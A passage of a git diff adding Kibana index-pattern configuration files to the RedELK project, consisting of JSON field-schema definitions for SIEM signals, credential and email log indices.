DocValues\":true},{\"count\":0,\"name\":\"url.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.scheme\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.full_name\"}}},{\"count\":0,\"name\":\"user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}},{\"count\":0,\"name\":\"user_agent.device.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.original\"}}},{\"count\":0,\"name\":\"user_agent.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.full\"}}},{\"count\":0,\"name\":\"user_agent.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.name\"}}},{\"count\":0,\"name\":\"user_agent.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.classification\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"vulnerability.description\"}}},{\"count\":0,\"name\":\"vulnerability.enumeration\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.report_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.scanner.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.base\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.environmental\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.temporal\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": ".siem-signals-*"}, "coreMigrationVersion": "7.16.3", "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171872765, 241], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_bluecheck.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_bluecheck.ndjson new file mode 100644 index 00000000..28c67c82 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_bluecheck.ndjson @@ -0,0 +1 @@ +{"attributes": {"fieldAttrs": "{\"bluecheck.sectools.Product\":{\"count\":1},\"bluechecktype\":{\"count\":1}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "bluecheck-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.3", "id": "972368b0-7b90-11ec-9471-7f985bde469d", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1644504089054, 308], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_credentials.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_credentials.ndjson new file mode 100644 index 00000000..4959e210 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_credentials.ndjson @@ -0,0 +1 @@ +{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.ephemeral_id\"}}},{\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.hostname.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.hostname\"}}},{\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.id\"}}},{\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.name.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.name\"}}},{\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.type\"}}},{\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.version\"}}},{\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.log.type\"}}},{\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.program.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.program\"}}},{\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.credential.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.credential\"}}},{\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.host.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.host\"}}},{\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.realm.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.realm\"}}},{\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.source\"}}},{\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.username.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.username\"}}},{\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"ecs.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"ecs.version\"}}},{\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.action.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.action\"}}},{\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.category.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.category\"}}},{\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.dataset.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.dataset\"}}},{\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.kind.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.kind\"}}},{\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.module.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.module\"}}},{\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.type\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.attack_scenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.attack_scenario\"}}},{\"name\":\"infra.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.log.type\"}}},{\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"input.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"input.type\"}}},{\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"log.file.path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"log.file.path\"}}},{\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"tags.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"tags\"}}}]", "timeFieldName": "@timestamp", "title": "credentials-*"}, "coreMigrationVersion": "7.16.3", "id": "credentials", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171858664, 19], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_email.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_email.ndjson new file mode 100644 index 00000000..e35579cc --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_email.ndjson @@ -0,0 +1 @@ +{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"accept-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"accept-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"accept-language\"}}},{\"name\":\"arc-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-authentication-results\"}}},{\"name\":\"arc-message-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-message-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-message-signature\"}}},{\"name\":\"arc-seal\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-seal.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-seal\"}}},{\"name\":\"attackscenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"attackscenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"attackscenario\"}}},{\"name\":\"authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results-original\"}}},{\"name\":\"authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results\"}}},{\"name\":\"content-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-language\"}}},{\"name\":\"content-transfer-encoding\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-transfer-encoding.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-transfer-encoding\"}}},{\"name\":\"content-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-type\"}}},{\"name\":\"date\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"date.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"date\"}}},{\"name\":\"dkim-signature\",\"type\":\"string\",\"esTypes\":[\"t